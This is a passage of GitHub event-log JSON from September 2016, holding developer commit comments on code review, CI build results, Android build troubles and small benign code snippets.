<https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975925>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AANmTzkc1JOLSHWQw-P9fe0rxEe_jTSuks5qo3k6gaJpZM4J5oQB>\n> .\n>\n"}},"created_at":"2016-09-11T04:41:18Z"}
{"id":"4545226879","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18975993,"position":null,"line":null,"path":null,"commit_id":"6af282154907081be3b06e11e44f337e5d72dfed","created_at":"2016-09-11T04:43:36Z","updated_at":"2016-09-11T04:43:36Z","body":"@Sami32 You are right."}},"created_at":"2016-09-11T04:43:36Z"}
{"id":"4545229628","type":"CommitCommentEvent","actor":{"login":"champsupertramp"},"repo":{"name":"ultimatemember/ultimatemember"},"payload":{"comment":{"id":18975995,"position":16,"line":162,"path":"core/um-members.php","commit_id":"a85a687ba7f78c45af2777535e1e67cbe3dd1104","created_at":"2016-09-11T04:46:28Z","updated_at":"2016-09-11T04:46:28Z","body":"Hi @wpdelighter,\r\n\r\ncan you please try pre-released version 1.3.71 in the link?\r\nhttps://github.com/ultimatemember/ultimatemember/releases\r\n\r\nSee merged fixes\r\nhttps://github.com/ultimatemember/ultimatemember/commit/e1483c57556e98c878af11635710c86df921de76#diff-fd9883148fb2a4a73350464ef1a69e05R168"}},"created_at":"2016-09-11T04:46:28Z"}
{"id":"4545230406","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18975996,"position":26,"line":404,"path":"src/main/java/net/pms/formats/Format.java","commit_id":"78295dc30bc95310bf7d92af325f082abafd03ba","created_at":"2016-09-11T04:47:17Z","updated_at":"2016-09-11T04:47:17Z","body":"@Sami32 it simply means my version doesn't output \"video/vnd.dlna.mpeg-tts\". While I can support ALL formats, it makes sense to postpone the support for individual formats to post-merge of the PR or this PR will simply never get merged."}},"created_at":"2016-09-11T04:47:17Z"}
{"id":"4545237289","type":"CommitCommentEvent","actor":{"login":"senakamura"},"repo":{"name":"reneechar/Context-Exercise"},"payload":{"comment":{"id":18976000,"position":19,"line":29,"path":"context.js","commit_id":"440660d682c0054e58deb3b1bee255407627a823","created_at":"2016-09-11T04:54:12Z","updated_at":"2016-09-11T04:54:12Z","body":"Please review readme again. \r\n\r\nThis is completely fine however follow the instructions as a practice in preparation for the real world -- we are expected to make sure things are up to spec, if names are different from other teammates expectations, this can cause problems when working together with the same code base. "}},"created_at":"2016-09-11T04:54:12Z"}
{"id":"4545238206","type":"CommitCommentEvent","actor":{"login":"qiaozhanrong"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18976001,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-11T04:55:11Z","updated_at":"2016-09-11T04:55:11Z","body":"滋磁UDP，不过我还是建议先用TCP写个简单点的？"}},"created_at":"2016-09-11T04:55:11Z"}
{"id":"4545245405","type":"CommitCommentEvent","actor":{"login":"sonalkr132"},"repo":{"name":"aycabta/rubygems.org"},"payload":{"comment":{"id":18976005,"position":null,"line":null,"path":null,"commit_id":"fafb665cad2bb5b6682afee1b3441f130f943100","created_at":"2016-09-11T05:02:35Z","updated_at":"2016-09-11T05:02:35Z","body":"Once again, @aycabta :smiley: \r\n> Following is single message for reserved_namespace:\r\n> > This gem previously existed, but has been removed by its owner. The RubyGems.org team has reserved this gem name for X more days. After that time is up, anyone will be able to claim this gem name using gem push.\r\nIf you are the previous owner of this gem, you can change ownership of this gem using the gem owner command. You can also create new versions of this gem using gem push.\r\n\r\n> not_hosted_notice and the page would remain the same."}},"created_at":"2016-09-11T05:02:35Z"}
{"id":"4545248039","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18976007,"position":null,"line":null,"path":null,"commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-11T05:04:55Z","updated_at":"2016-09-11T05:04:55Z","body":"Generated code:\r\n\r\n```\r\n  void ByteOrderFields() {\r\n    flatbuffers::ByteOrderScalar<int64_t>(GetAddressOf(VT_OBJ_ID));\r\n    flatbuffers::ByteOrderScalar<int64_t>(GetAddressOf(VT_AGE));\r\n    flatbuffers::ByteOrderScalar<int64_t>(GetAddressOf(VT_SCORE));\r\n  }\r\n  void HostOrderFields() {\r\n    flatbuffers::HostOrderScalar<int64_t>(GetAddressOf(VT_OBJ_ID));\r\n    flatbuffers::HostOrderScalar<int64_t>(GetAddressOf(VT_AGE));\r\n    flatbuffers::HostOrderScalar<int64_t>(GetAddressOf(VT_SCORE));\r\n  }\r\n  const uint8_t *GetKey() const {\r\n    return GetAddressOf(VT_OBJ_ID);\r\n  } \r\n  size_t GetKeySize() const {\r\n    return GetAddressOf(VT_SCORE) -\r\n      GetAddressOf(VT_OBJ_ID) +\r\n      sizeof(double);\r\n  }   \r\n```"}},"created_at":"2016-09-11T05:04:55Z"}
{"id":"4545252966","type":"CommitCommentEvent","actor":{"login":"purvabh00"},"repo":{"name":"evhsnewspaper-cougar-chronicles/evhsnewspaper-cougar-chronicles.github.io"},"payload":{"comment":{"id":18976012,"position":null,"line":null,"path":null,"commit_id":"b3039a13f61a320bca402d4b21d1d983f0324688","created_at":"2016-09-11T05:09:39Z","updated_at":"2016-09-11T05:09:39Z","body":"tryna fix the js stuff but not working"}},"created_at":"2016-09-11T05:09:39Z"}
{"id":"4545253339","type":"CommitCommentEvent","actor":{"login":"lj2007331"},"repo":{"name":"kaneawk/oneinstack"},"payload":{"comment":{"id":18976013,"position":null,"line":null,"path":null,"commit_id":"b0cfc45c619809761b7b1c1b9b06dc3b274b25d4","created_at":"2016-09-11T05:10:03Z","updated_at":"2016-09-11T05:10:03Z","body":"good idea, Can you submit it to master?"}},"created_at":"2016-09-11T05:10:03Z"}
{"id":"4545253595","type":"CommitCommentEvent","actor":{"login":"flar2"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18976014,"position":null,"line":null,"path":null,"commit_id":"4dd886eb6ea57a51f5cad2fbf5ebc2f2a74e20ea","created_at":"2016-09-11T05:10:17Z","updated_at":"2016-09-11T05:10:17Z","body":"It works"}},"created_at":"2016-09-11T05:10:17Z"}
{"id":"4545256336","type":"CommitCommentEvent","actor":{"login":"lmihalkovic"},"repo":{"name":"arduino/Arduino"},"payload":{"comment":{"id":18976015,"position":null,"line":null,"path":null,"commit_id":"982d4f3fbfd8ee6cb5a281d2c562f8c21cd32e77","created_at":"2016-09-11T05:13:01Z","updated_at":"2016-09-11T05:13:01Z","body":"I see you finally destroyed the most clever part of the IDE codebase. "}},"created_at":"2016-09-11T05:13:01Z"}
{"id":"4545256488","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18976016,"position":null,"line":null,"path":null,"commit_id":"fa4c02cb51cdb7eec7a4cc10ec0ed7d6a1e2c3ff","created_at":"2016-09-11T05:13:13Z","updated_at":"2016-09-11T05:13:13Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/fa4c02cb51cdb7eec7a4cc10ec0ed7d6a1e2c3ff#commitcomment-18975940) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/464fb1fe704cd067407e36644c1f7bc133e53313/daily_2016_9_11/report.md). cc @jrevels"}},"created_at":"2016-09-11T05:13:13Z"}
{"id":"4545257027","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18976017,"position":null,"line":null,"path":null,"commit_id":"57127b7bfffa174f2de8d92e19d8d6865529eae1","created_at":"2016-09-11T05:13:47Z","updated_at":"2016-09-11T05:13:47Z","body":"fix_gcc48_ICE (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-11T05:13:47Z"}
{"id":"4545260902","type":"CommitCommentEvent","actor":{"login":"Lehkeda"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976020,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T05:17:51Z","updated_at":"2016-09-11T05:17:51Z","body":"after trying \"export ANDROID_JACK_VM_ARGS=\"-Xmx4g -Dfile.encoding=UTF-8 -XX:+TieredCompilation\" \" now the build stuck at \" Compiling SDK Stubs with Jack: /home/hesham/cm-14.0/o...on/obj/JAVA_LIBRARIES/android_stubs_current_intermediates/classes.jack \" and the connection with jack is lost ... so do you have any suggestions ?"}},"created_at":"2016-09-11T05:17:51Z"}
{"id":"4545263816","type":"CommitCommentEvent","actor":{"login":"A-gent"},"repo":{"name":"A-gent/stackReferences"},"payload":{"comment":{"id":18976024,"position":1,"line":1,"path":"README.md","commit_id":"11982f6e8dc4a888afb2bf9c4987bf083f61d3db","created_at":"2016-09-11T05:20:47Z","updated_at":"2016-09-11T05:20:47Z","body":"Finalize_README"}},"created_at":"2016-09-11T05:20:47Z"}
{"id":"4545263827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18976025,"position":null,"line":null,"path":null,"commit_id":"57127b7bfffa174f2de8d92e19d8d6865529eae1","created_at":"2016-09-11T05:20:47Z","updated_at":"2016-09-11T05:20:47Z","body":"fix_gcc48_ICE (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2368 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-11T05:20:47Z"}
{"id":"4545264028","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18976026,"position":null,"line":null,"path":null,"commit_id":"57127b7bfffa174f2de8d92e19d8d6865529eae1","created_at":"2016-09-11T05:21:03Z","updated_at":"2016-09-11T05:21:03Z","body":"fix_gcc48_ICE (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-11T05:21:03Z"}
{"id":"4545266031","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18976027,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-11T05:23:14Z","updated_at":"2016-09-11T05:23:14Z","body":"Awesome! Congrats!!"}},"created_at":"2016-09-11T05:23:14Z"}
{"id":"4545270178","type":"CommitCommentEvent","actor":{"login":"underdoeg"},"repo":{"name":"openframeworks/openFrameworks"},"payload":{"comment":{"id":18976034,"position":5,"line":0,"path":"libs/openFrameworks/app/ofAppGLFWWindow.cpp","commit_id":"e9dd408880f34ef4125b3d090c0401f5c5c754e7","created_at":"2016-09-11T05:27:38Z","updated_at":"2016-09-11T05:27:38Z","body":"Shouldnt that be a &&?"}},"created_at":"2016-09-11T05:27:38Z"}
{"id":"4545270227","type":"CommitCommentEvent","actor":{"login":"mamanjusha"},"repo":{"name":"mamanjusha/Resume"},"payload":{"comment":{"id":18976035,"position":null,"line":null,"path":null,"commit_id":"da815dd6ec657986fdd67401d05616f26c23d1e2","created_at":"2016-09-11T05:27:41Z","updated_at":"2016-09-11T05:27:41Z","body":"Fixing indentation"}},"created_at":"2016-09-11T05:27:41Z"}
{"id":"4545270455","type":"CommitCommentEvent","actor":{"login":"thinhx2"},"repo":{"name":"nitro-cancro/android_hardware_qcom_display"},"payload":{"comment":{"id":18976036,"position":null,"line":null,"path":null,"commit_id":"db930424be8f135986f6f919dd2f3f7867f21896","created_at":"2016-09-11T05:27:54Z","updated_at":"2016-09-11T05:27:54Z","body":"yes"}},"created_at":"2016-09-11T05:27:54Z"}
{"id":"4545270626","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976037,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T05:28:04Z","updated_at":"2016-09-11T05:28:04Z","body":"I do not know. Try a clean build or a re-sync the source. I deleted my source and re-synced it make the build successful."}},"created_at":"2016-09-11T05:28:04Z"}
{"id":"4545277353","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18976056,"position":null,"line":null,"path":null,"commit_id":"9e8c4919a7d63501bcda71ad573296b829542106","created_at":"2016-09-11T05:34:41Z","updated_at":"2016-09-11T05:34:41Z","body":"Practical implementation - case when you need to do a system messages involving other person:\r\n````\r\naddNotice('success', 'You are no longer friend with '.fusion_get_user($_POST['user_id'], 'user_name'));\r\n````\r\nNo need to run any query whatsoever. Running same users will never stack on your query count. It's a cache solution."}},"created_at":"2016-09-11T05:34:41Z"}
{"id":"4545277956","type":"CommitCommentEvent","actor":{"login":"sarb0005"},"repo":{"name":"sarb0005/COMP2772-Assignment-1"},"payload":{"comment":{"id":18976059,"position":null,"line":null,"path":null,"commit_id":"60e8e59b8609a167c80b52f5da05bb23cde6dc54","created_at":"2016-09-11T05:35:18Z","updated_at":"2016-09-11T05:35:18Z","body":"+#placeholder"}},"created_at":"2016-09-11T05:35:18Z"}
{"id":"4545279296","type":"CommitCommentEvent","actor":{"login":"bgrainger"},"repo":{"name":"bgrainger/Pomelo.EntityFrameworkCore.MySql"},"payload":{"comment":{"id":18976061,"position":null,"line":null,"path":null,"commit_id":"0e2a88a0612f439a9414d6b997b795ec77bc5a09","created_at":"2016-09-11T05:36:36Z","updated_at":"2016-09-11T05:36:36Z","body":"Can we do something smarter (than using reflection) here, since `JsonObject<T>` is available? I was trying to figure out if some `static JsonObject.Create<T>(byte[] data)` method would be possible to create, but couldn't figure out a way to write it generically."}},"created_at":"2016-09-11T05:36:36Z"}
{"id":"4545279513","type":"CommitCommentEvent","actor":{"login":"Ape"},"repo":{"name":"bmc0/dsp"},"payload":{"comment":{"id":18976063,"position":null,"line":null,"path":null,"commit_id":"d36b3df61ad1b597745e7b671b9bb0a3ff06a3ae","created_at":"2016-09-11T05:36:50Z","updated_at":"2016-09-11T05:36:50Z","body":"Thanks! It must be a coincidence, but just yesterday I was thinking about if there are any effects that would be a nice addition to this project. The only one I could think of was reverb. And just hours later I can see this commit!"}},"created_at":"2016-09-11T05:36:50Z"}
{"id":"4545282618","type":"CommitCommentEvent","actor":{"login":"cmungall"},"repo":{"name":"cmungall/mybiocaddie"},"payload":{"comment":{"id":18976067,"position":null,"line":null,"path":null,"commit_id":"e90c35ba1e48e5e627c2c86b942268b67e989167","created_at":"2016-09-11T05:40:06Z","updated_at":"2016-09-11T05:40:06Z","body":"Fixes https://github.com/cmungall/biocaddie-gym/issues/15"}},"created_at":"2016-09-11T05:40:06Z"}
{"id":"4545284269","type":"CommitCommentEvent","actor":{"login":"amoxic"},"repo":{"name":"fengyu327/amoxic_test"},"payload":{"comment":{"id":18976068,"position":null,"line":null,"path":null,"commit_id":"83e4d41933ca3d33289c49fe8703e7e2e54e0dcd","created_at":"2016-09-11T05:41:51Z","updated_at":"2016-09-11T05:41:51Z","body":"add comment for the 1st commit"}},"created_at":"2016-09-11T05:41:51Z"}
{"id":"4545286265","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18976069,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-11T05:43:50Z","updated_at":"2016-09-11T05:43:50Z","body":"@atamariya \r\n* I have a hard time to see why WMP need to make 1000 request at a time, but it shouldn't be a problem for the socket to handle anyway. The cost of handling those are in UMS' request handlers anyway, and I can't see them handling 1000 requests at a time anytime soon.\r\n* Is that really an argument?\r\n* As I said originally, I'm sure netty has a lot of fancy functionality, but I'm not sure it's needed. Netty needs to use a socket at one point as well, so all I can see is that netty adds complexity. \r\n\r\n@UniversalMediaServer/developers What I'm wondering is what V1 *can't* do, why V2 was implemented in the first place. Can't it for example handle chunked transfers? All I know is that using Netty there are several issues that's not there using V1. It might be because UMS use Netty wrong, but even trying to figure that out needs some justification in that there is an advantage to using Netty."}},"created_at":"2016-09-11T05:43:50Z"}
{"id":"4545287064","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18976073,"position":null,"line":null,"path":null,"commit_id":"57127b7bfffa174f2de8d92e19d8d6865529eae1","created_at":"2016-09-11T05:44:37Z","updated_at":"2016-09-11T05:44:37Z","body":"fix_gcc48_ICE (mbadams5) - Win64-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-11T05:44:37Z"}
{"id":"4545287520","type":"CommitCommentEvent","actor":{"login":"amoxic"},"repo":{"name":"amoxic/amoxic_test"},"payload":{"comment":{"id":18976075,"position":null,"line":null,"path":null,"commit_id":"1ba3fc787010d75f39e9498f4bc1ae5af91fa303","created_at":"2016-09-11T05:45:07Z","updated_at":"2016-09-11T05:45:07Z","body":"add commit for the 2nd commit"}},"created_at":"2016-09-11T05:45:07Z"}
{"id":"4545288491","type":"CommitCommentEvent","actor":{"login":"Thutmose"},"repo":{"name":"Thutmose/Pokecube"},"payload":{"comment":{"id":18976076,"position":null,"line":null,"path":null,"commit_id":"f54095a24c84993f94cb2cf66e0b3fa4a1ed1f22","created_at":"2016-09-11T05:46:03Z","updated_at":"2016-09-11T05:46:03Z","body":"This should say \"Initial Secret Base support\", Seems I was looking at a lucky egg when I typed the commit message, and was too tired, so typed lucky egg instead"}},"created_at":"2016-09-11T05:46:03Z"}
{"id":"4545290865","type":"CommitCommentEvent","actor":{"login":"vlad2005"},"repo":{"name":"cyosp/rc-switch"},"payload":{"comment":{"id":18976078,"position":null,"line":null,"path":null,"commit_id":"59d8b1431573ebfa2abcc6f07d7b520f8169093f","created_at":"2016-09-11T05:48:30Z","updated_at":"2016-09-11T05:48:30Z","body":"Hi!\r\nI want to use your fork because i need external interrupt pins for other task.\r\nI make small modifications to be able to use on an arduino pro mini board, so i use defined USE_PIN_CHANGE_INTERRUPT to include necessary  code. But it's seem that not working.\r\nHere is what i do:\r\n[code]\r\n#include <RCSwitch.h>\r\n\r\nRCSwitch mySwitch = RCSwitch();\r\n\r\nvoid setup() \r\n{\r\n  Serial.begin(9600);\r\n  mySwitch.enableReceive(A0);\r\n}\r\n\r\nvoid loop() \r\n{\r\n  if (mySwitch.available()) {\r\n    int value = mySwitch.getReceivedValue();\r\n    Serial.println(value);\r\n    delay(500);\r\n    mySwitch.resetAvailable();\r\n  }\r\n\r\n}\r\n[/code]\r\nI don't have any error on compilation. Also i put some debug lines on library to see that is invoked routines that i want and it's seem that is ok."}},"created_at":"2016-09-11T05:48:30Z"}
{"id":"4545291771","type":"CommitCommentEvent","actor":{"login":"Gr8TheNate"},"repo":{"name":"Dakota-maulding/Cmps285"},"payload":{"comment":{"id":18976079,"position":9,"line":9,"path":"readme.md","commit_id":"7a12cef081664e10325bc1460048682f8c55d0b5","created_at":"2016-09-11T05:49:29Z","updated_at":"2016-09-11T05:49:29Z","body":"and variables and methods should be camelCase for ease of understanding."}},"created_at":"2016-09-11T05:49:29Z"}
{"id":"4545292121","type":"CommitCommentEvent","actor":{"login":"WilliamBaumbach1212"},"repo":{"name":"WilliamBaumbach1212/War"},"payload":{"comment":{"id":18976080,"position":97,"line":97,"path":"War/main.cpp","commit_id":"084a34dd8964c952e5f4dbc0710d7f7d0e6f2c75","created_at":"2016-09-11T05:49:50Z","updated_at":"2016-09-11T05:49:50Z","body":"This is where I believe the error occurs on turn 19. I think it has to do with comparing the two top elements of the stack, but I haven't quite figured out what the problem is."}},"created_at":"2016-09-11T05:49:50Z"}
{"id":"4545292292","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976081,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T05:50:02Z","updated_at":"2016-09-11T05:50:02Z","body":"I always hated this stupid jack.\r\nwhat's ur pc conf @ngoquang2708 ?"}},"created_at":"2016-09-11T05:50:02Z"}
{"id":"4545292942","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":18976082,"position":null,"line":null,"path":null,"commit_id":"f85ccdc1ca7da23ad12a30ff366264feab2b3beb","created_at":"2016-09-11T05:50:40Z","updated_at":"2016-09-11T05:50:40Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;31TITAt3&#x2F;4-migrate-database-to-postgresql\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Migrate database to PostgreSQL</a>"}},"created_at":"2016-09-11T05:50:40Z"}
{"id":"4545295766","type":"CommitCommentEvent","actor":{"login":"weihefunnyjuly"},"repo":{"name":"weihefunnyjuly/testsec"},"payload":{"comment":{"id":18976084,"position":null,"line":null,"path":null,"commit_id":"f796c6bed8c97d0ac106699a32ef3608799c547b","created_at":"2016-09-11T05:53:30Z","updated_at":"2016-09-11T05:53:30Z","body":"Second commit"}},"created_at":"2016-09-11T05:53:30Z"}
{"id":"4545298935","type":"CommitCommentEvent","actor":{"login":"kpxp"},"repo":{"name":"luiges90/ZhongHuaSanGuoZhi"},"payload":{"comment":{"id":18976087,"position":null,"line":null,"path":null,"commit_id":"30cc7659f319520c13ecafc01dec24e8b6753884","created_at":"2016-09-11T05:56:49Z","updated_at":"2016-09-11T05:56:49Z","body":"@luiges90 可以发我看看？"}},"created_at":"2016-09-11T05:56:49Z"}
{"id":"4545299436","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976090,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T05:57:22Z","updated_at":"2016-09-11T05:57:22Z","body":"Laptop i3 8G RAM 128G SSD + 1T HDD. The origin spec is not that high. I have upgraded all of them the get that spec but the CPU :(."}},"created_at":"2016-09-11T05:57:22Z"}
{"id":"4545299819","type":"CommitCommentEvent","actor":{"login":"syuilo"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":18976092,"position":null,"line":null,"path":null,"commit_id":"b1d3f9c4925e176d62f2b97f299e6f076088ac31","created_at":"2016-09-11T05:57:49Z","updated_at":"2016-09-11T05:57:49Z","body":"URLという情報だけで十分じゃないの？"}},"created_at":"2016-09-11T05:57:49Z"}
{"id":"4545300686","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976093,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T05:58:43Z","updated_at":"2016-09-11T05:58:43Z","body":"well lehkeda has i5, ram is 4GB, he did add swap tho\r\nare you keeping the source on SSD?"}},"created_at":"2016-09-11T05:58:43Z"}
{"id":"4545301019","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18976094,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-11T05:59:08Z","updated_at":"2016-09-11T05:59:08Z","body":"What are the issues that are in V2 that aren't in V1?"}},"created_at":"2016-09-11T05:59:08Z"}
{"id":"4545303551","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18976135,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T06:01:02Z","updated_at":"2016-09-11T06:01:02Z","body":"i5 is much better.\r\nKeeping source on SSD do not much for me since my laptop is CPU bound!"}},"created_at":"2016-09-11T06:01:02Z"}
{"id":"4545303956","type":"CommitCommentEvent","actor":{"login":"awk888"},"repo":{"name":"awk888/lego.github.io"},"payload":{"comment":{"id":18976136,"position":null,"line":null,"path":null,"commit_id":"12069bc5e73d25bf13ff251365f2e303a8bf79be","created_at":"2016-09-11T06:01:24Z","updated_at":"2016-09-11T06:01:24Z","body":"added"}},"created_at":"2016-09-11T06:01:24Z"}
{"id":"4545304561","type":"CommitCommentEvent","actor":{"login":"yvasilyev92"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":18976145,"position":null,"line":null,"path":null,"commit_id":"1d424934d97c8c772978837c0eebb292cbc7f808","created_at":"2016-09-11T06:02:00Z","updated_at":"2016-09-11T06:02:00Z","body":"@NunoHenriquePinheiro \r\n\r\nMy guess is you are trying to create this part doing the way they did in video. Those videos are outdated and you have to create it a different way. Dont create a fragment class in your MainActivity class. Instead Create your own MainActivityFragment class and add this code to it.\r\n\r\npublic class MainActivityFragment extends Fragment {\r\n\r\n    ArrayAdapter<String> mForecastAdapter;\r\n\r\n    public MainActivityFragment(){\r\n\r\n    }\r\n\r\n    @Override\r\n    public View onCreateView(LayoutInflater inflater, ViewGroup container,\r\n                             Bundle savedInstanceState) {\r\n        //create some dummy data for the list view\r\n        String[] data = {\r\n                \"mon 6/23 - sunny -32/17\",\r\n                \"tues 6/24 - cold -30/17\",\r\n                \"wed 6/25 - wet -35/17\",\r\n                \"thur 6/26 - hot -36/17\",\r\n                \"fri 6/27 - warm -30/17\",\r\n                \"sat 6/28 - hot -40/17\",\r\n                \"sun 6/29 - cold -41/17\"\r\n        };\r\n        List<String> weekForecast = new ArrayList<String>(Arrays.asList(data));\r\n\r\n        mForecastAdapter =\r\n                new ArrayAdapter<String>(\r\n                        getActivity(), //The current context(this activity)\r\n                        R.layout.list_item_forecast, //the name of the layout id\r\n                        R.id.list_item_forecast_textview, //the id of the textview to populate\r\n                        weekForecast //forecast data\r\n                );\r\n\r\n\r\n        View rootView = inflater.inflate(R.layout.fragment_placeholder, container, false);\r\n\r\n        //get a reference to the listview and attach the adapter to it\r\n        ListView listView = (ListView) rootView.findViewById(R.id.listview_forecast);\r\n        listView.setAdapter(mForecastAdapter);\r\n\r\n\r\n        return rootView;\r\n    }\r\n}\r\nYour MainActivity should just look like this.\r\npublic class MainActivity extends AppCompatActivity {\r\n\r\n    @Override\r\n    protected void onCreate(Bundle savedInstanceState) {\r\n        super.onCreate(savedInstanceState);\r\n        setContentView(R.layout.activity_main);\r\n        if (savedInstanceState == null) {\r\n            getSupportFragmentManager().beginTransaction()\r\n                    .add(R.id.container, new MainActivityFragment())\r\n                    .commit();\r\n        }\r\n    }\r\n}\r\n\r\nYour activity_main.xml should look like this\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<FrameLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\r\n    xmlns:tools=\"http://schemas.android.com/tools\"\r\n    android:layout_width=\"match_parent\"\r\n    android:layout_height=\"match_parent\"\r\n  